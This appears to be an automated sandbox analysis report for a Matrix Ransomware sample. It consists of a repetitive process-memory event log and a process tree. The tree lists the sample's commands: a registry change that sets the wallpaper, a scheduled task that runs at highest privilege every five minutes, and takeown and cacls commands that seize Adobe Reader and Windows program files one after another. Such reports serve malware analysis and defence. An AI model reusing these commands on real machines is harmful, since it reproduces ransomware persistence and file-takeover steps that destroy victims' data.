a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1256 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1256 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1256 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1256 PID 528 wrote to memory of 1748 528 cmd.exe 1258 PID 528 wrote to memory of 1748 528 cmd.exe 1258 PID 528 wrote to memory of 1748 528 cmd.exe 1258 PID 528 wrote to memory of 1748 528 cmd.exe 1258 PID 528 wrote to memory of 1944 528 cmd.exe 1259 PID 528 wrote to memory of 1944 528 cmd.exe 1259 PID 528 wrote to memory of 1944 528 cmd.exe 1259 PID 528 wrote to memory of 1944 528 cmd.exe 1259 PID 528 wrote to memory of 1936 528 cmd.exe 1260 PID 528 wrote to memory of 1936 528 cmd.exe 1260 PID 528 wrote to memory of 1936 528 cmd.exe 1260 PID 528 wrote to memory of 1936 528 cmd.exe 1260 PID 1936 wrote to memory of 1076 1936 cmd.exe 1261 PID 1936 wrote to memory of 1076 1936 cmd.exe 1261 PID 1936 wrote to memory of 1076 1936 cmd.exe 1261 PID 1936 wrote to memory of 1076 1936 cmd.exe 1261 PID 528 wrote to memory of 436 528 cmd.exe 1262 PID 528 wrote to memory of 436 528 cmd.exe 1262 PID 528 wrote to memory of 436 528 cmd.exe 1262 PID 528 wrote to memory of 436 528 cmd.exe 1262 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1263 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1263 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1263 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1263 PID 1152 wrote to memory of 1088 1152 cmd.exe 1265 PID 1152 wrote to memory of 1088 1152 cmd.exe 1265 PID 1152 wrote to memory of 1088 1152 cmd.exe 1265 PID 1152 wrote to memory of 1088 1152 cmd.exe 1265 PID 1152 wrote to memory of 1808 1152 cmd.exe 1266 PID 1152 wrote to memory of 1808 1152 cmd.exe 1266 PID 1152 wrote to memory of 1808 1152 cmd.exe 1266 PID 1152 wrote to memory of 1808 1152 cmd.exe 1266 PID 1152 wrote to memory of 472 1152 cmd.exe 1267 PID 1152 wrote to memory of 472 1152 cmd.exe 1267 PID 1152 wrote to memory of 472 1152 cmd.exe 1267 PID 1152 wrote to memory of 472 1152 cmd.exe 1267 PID 472 wrote to memory of 2032 472 cmd.exe 1268 PID 472 wrote to memory of 2032 472 cmd.exe 1268 PID 472 wrote to memory of 2032 472 cmd.exe 1268 PID 472 wrote to memory of 2032 472 cmd.exe 1268 PID 1152 wrote to memory of 1232 1152 cmd.exe 1269 PID 1152 wrote to memory of 1232 1152 cmd.exe 1269 PID 1152 wrote to memory of 1232 1152 cmd.exe 1269 PID 1152 wrote to memory of 1232 1152 cmd.exe 1269 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1270 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1270 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1270 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1270 PID 232 wrote to memory of 836 232 cmd.exe 1272 PID 232 wrote to memory of 836 232 cmd.exe 1272 PID 232 wrote to memory of 836 232 cmd.exe 1272 PID 232 wrote to memory of 836 232 cmd.exe 1272 PID 232 wrote to memory of 1488 232 cmd.exe 1273 PID 232 wrote to memory of 1488 232 cmd.exe 1273 PID 232 wrote to memory of 1488 232 cmd.exe 1273 PID 232 wrote to memory of 1488 232 cmd.exe 1273 PID 232 wrote to memory of 1412 232 cmd.exe 1274 PID 232 wrote to memory of 1412 232 cmd.exe 1274 PID 232 wrote to memory of 1412 232 cmd.exe 1274 PID 232 wrote to memory of 1412 232 cmd.exe 1274 PID 1412 wrote to memory of 1112 1412 cmd.exe 1275 PID 1412 wrote to memory of 1112 1412 cmd.exe 1275 PID 1412 wrote to memory of 1112 1412 cmd.exe 1275 PID 1412 wrote to memory of 1112 1412 cmd.exe 1275 PID 232 wrote to memory of 1984 232 cmd.exe 1276 PID 232 wrote to memory of 1984 232 cmd.exe 1276 PID 232 wrote to memory of 1984 232 cmd.exe 1276 PID 232 wrote to memory of 1984 232 cmd.exe 1276 PID 616 wrote to memory of 1256 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1277 PID 616 wrote to memory of 1256 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1277 PID 616 wrote to memory of 1256 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1277 PID 616 wrote to memory of 1256 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1277 PID 1256 wrote to memory of 1828 1256 cmd.exe 1279 PID 1256 wrote to memory of 1828 1256 cmd.exe 1279 PID 1256 wrote to memory of 1828 1256 cmd.exe 1279 PID 1256 wrote to memory of 1828 1256 cmd.exe 1279 PID 1256 wrote to memory of 1748 1256 cmd.exe 1280 PID 1256 wrote to memory of 1748 1256 cmd.exe 1280 PID 1256 wrote to memory of 1748 1256 cmd.exe 1280 PID 1256 wrote to memory of 1748 1256 cmd.exe 1280 PID 1256 wrote to memory of 320 1256 cmd.exe 1281 PID 1256 wrote to memory of 320 1256 cmd.exe 1281 PID 1256 wrote to memory of 320 1256 cmd.exe 1281 PID 1256 wrote to memory of 320 1256 cmd.exe 1281 PID 320 wrote to memory of 1432 320 cmd.exe 1282 PID 320 wrote to memory of 1432 320 cmd.exe 1282 PID 320 wrote to memory of 1432 320 cmd.exe 1282 PID 320 wrote to memory of 1432 320 cmd.exe 1282 PID 1256 wrote to memory of 1948 1256 cmd.exe 1283 PID 1256 wrote to memory of 1948 1256 cmd.exe 1283 PID 1256 wrote to memory of 1948 1256 cmd.exe 1283 PID 1256 wrote to memory of 1948 1256 cmd.exe 1283 PID 616 wrote to memory of 1468 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1284 PID 616 wrote to memory of 1468 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1284 PID 616 wrote to memory of 1468 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1284 PID 616 wrote to memory of 1468 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1284 PID 1468 wrote to memory of 856 1468 cmd.exe 1286 PID 1468 wrote to memory of 856 1468 cmd.exe 1286 PID 1468 wrote to memory of 856 1468 cmd.exe 1286 PID 1468 wrote to memory of 856 1468 cmd.exe 1286 PID 1468 wrote to memory of 1168 1468 cmd.exe 1287 PID 1468 wrote to memory of 1168 1468 cmd.exe 1287 PID 1468 wrote to memory of 1168 1468 cmd.exe 1287 PID 1468 wrote to memory of 1168 1468 cmd.exe 1287 PID 1468 wrote to memory of 1440 1468 cmd.exe 1288 PID 1468 wrote to memory of 1440 1468 cmd.exe 1288 PID 1468 wrote to memory of 1440 1468 cmd.exe 1288 PID 1468 wrote to memory of 1440 1468 cmd.exe 1288 PID 1440 wrote to memory of 1120 1440 cmd.exe 1289 PID 1440 wrote to memory of 1120 1440 cmd.exe 1289 PID 1440 wrote to memory of 1120 1440 cmd.exe 1289 PID 1440 wrote to memory of 1120 1440 cmd.exe 1289 PID 1468 wrote to memory of 972 1468 cmd.exe 1290 PID 1468 wrote to memory of 972 1468 cmd.exe 1290 PID 1468 wrote to memory of 972 1468 cmd.exe 1290 PID 1468 wrote to memory of 972 1468 cmd.exe 1290 PID 616 wrote to memory of 860 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1291 PID 616 wrote to memory of 860 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1291 PID 616 wrote to memory of 860 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1291 PID 616 wrote to memory of 860 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1291 PID 860 wrote to memory of 1964 860 cmd.exe 1293 PID 860 wrote to memory of 1964 860 cmd.exe 1293 PID 860 wrote to memory of 1964 860 cmd.exe 1293 PID 860 wrote to memory of 1964 860 cmd.exe 1293 PID 860 wrote to memory of 1680 860 cmd.exe 1294 PID 860 wrote to memory of 1680 860 cmd.exe 1294 PID 860 wrote to memory of 1680 860 cmd.exe 1294 PID 860 wrote to memory of 1680 860 cmd.exe 1294 PID 860 wrote to memory of 1476 860 cmd.exe 1295 PID 860 wrote to memory of 1476 860 cmd.exe 1295 PID 860 wrote to memory of 1476 860 cmd.exe 1295 PID 860 wrote to memory of 1476 860 cmd.exe 1295 PID 1476 wrote to memory of 1776 1476 cmd.exe 1296 PID 1476 wrote to memory of 1776 1476 cmd.exe 1296 PID 1476 wrote to memory of 1776 1476 cmd.exe 1296 PID 1476 wrote to memory of 1776 1476 cmd.exe 1296 PID 860 wrote to memory of 1980 860 cmd.exe 1297 PID 860 wrote to memory of 1980 860 cmd.exe 1297 PID 860 wrote to memory of 1980 860 cmd.exe 1297 PID 860 wrote to memory of 1980 860 cmd.exe 1297 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1298 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1298 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1298 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1298 PID 1460 wrote to memory of 1060 1460 cmd.exe 1300 PID 1460 wrote to memory of 1060 1460 cmd.exe 1300 PID 1460 wrote to memory of 1060 1460 cmd.exe 1300 PID 1460 wrote to memory of 1060 1460 cmd.exe 1300 PID 1460 wrote to memory of 1472 1460 cmd.exe 1301 PID 1460 wrote to memory of 1472 1460 cmd.exe 1301 PID 1460 wrote to memory of 1472 1460 cmd.exe 1301 PID 1460 wrote to memory of 1472 1460 cmd.exe 1301 PID 1460 wrote to memory of 1748 1460 cmd.exe 1302 PID 1460 wrote to memory of 1748 1460 cmd.exe 1302 PID 1460 wrote to memory of 1748 1460 cmd.exe 1302 PID 1460 wrote to memory of 1748 1460 cmd.exe 1302 PID 1748 wrote to memory of 228 1748 cmd.exe 1303 PID 1748 wrote to memory of 228 1748 cmd.exe 1303 PID 1748 wrote to memory of 228 1748 cmd.exe 1303 PID 1748 wrote to memory of 228 1748 cmd.exe 1303 PID 1460 wrote to memory of 320 1460 cmd.exe 1304 PID 1460 wrote to memory of 320 1460 cmd.exe 1304 PID 1460 wrote to memory of 320 1460 cmd.exe 1304 PID 1460 wrote to memory of 320 1460 cmd.exe 1304 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1305 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1305 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1305 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1305 PID 1948 wrote to memory of 1188 1948 cmd.exe 1307 PID 1948 wrote to memory of 1188 1948 cmd.exe 1307 PID 1948 wrote to memory of 1188 1948 cmd.exe 1307 PID 1948 wrote to memory of 1188 1948 cmd.exe 1307 PID 1948 wrote to memory of 856 1948 cmd.exe 1308 PID 1948 wrote to memory of 856 1948 cmd.exe 1308 PID 1948 wrote to memory of 856 1948 cmd.exe 1308 PID 1948 wrote to memory of 856 1948 cmd.exe 1308 PID 1948 wrote to memory of 1168 1948 cmd.exe 1309 PID 1948 wrote to memory of 1168 1948 cmd.exe 1309 PID 1948 wrote to memory of 1168 1948 cmd.exe 1309 PID 1948 wrote to memory of 1168 1948 cmd.exe 1309 PID 1168 wrote to memory of 2032 1168 cmd.exe 1310 PID 1168 wrote to memory of 2032 1168 cmd.exe 1310 PID 1168 wrote to memory of 2032 1168 cmd.exe 1310 PID 1168 wrote to memory of 2032 1168 cmd.exe 1310 PID 1948 wrote to memory of 1440 1948 cmd.exe 1311 PID 1948 wrote to memory of 1440 1948 cmd.exe 1311 PID 1948 wrote to memory of 1440 1948 cmd.exe 1311 PID 1948 wrote to memory of 1440 1948 cmd.exe 1311
Processes
-
C:\Users\Admin\AppData\Local\Temp\a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe"C:\Users\Admin\AppData\Local\Temp\a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe" "C:\Users\Admin\AppData\Local\Temp\NWTyHvYy.exe"2⤵PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\NWTyHvYy.exe"C:\Users\Admin\AppData\Local\Temp\NWTyHvYy.exe" -n2⤵
- Executes dropped EXE
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\bkxIAUsR.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\bkxIAUsR.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1796
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1824
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\LRgs0dFv.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\LRgs0dFv.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\LVdYYcnh.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\LVdYYcnh.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:680
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1400
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:2024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp64.exeRzKn8STp.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:792 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:1400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2036
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1940 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:2024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:860 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1088
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1784 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1584
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:972 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
- Loads dropped DLL
PID:2032 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵
- Loads dropped DLL
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""2⤵
- Loads dropped DLL
PID:680 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Journal.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Journal.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""2⤵
- Loads dropped DLL
PID:564 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Graph.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Graph.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1328
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵
- Loads dropped DLL
PID:1956 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "wabmig.exe" -nobanner3⤵
- Loads dropped DLL
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵
- Loads dropped DLL
PID:1868 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "eula.ini" -nobanner3⤵
- Loads dropped DLL
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "eula.ini" -nobanner4⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵
- Loads dropped DLL
PID:1032 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "AcroSign.prc" -nobanner3⤵
- Loads dropped DLL
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "AcroSign.prc" -nobanner4⤵
- Executes dropped EXE
PID:1020
-
-
-
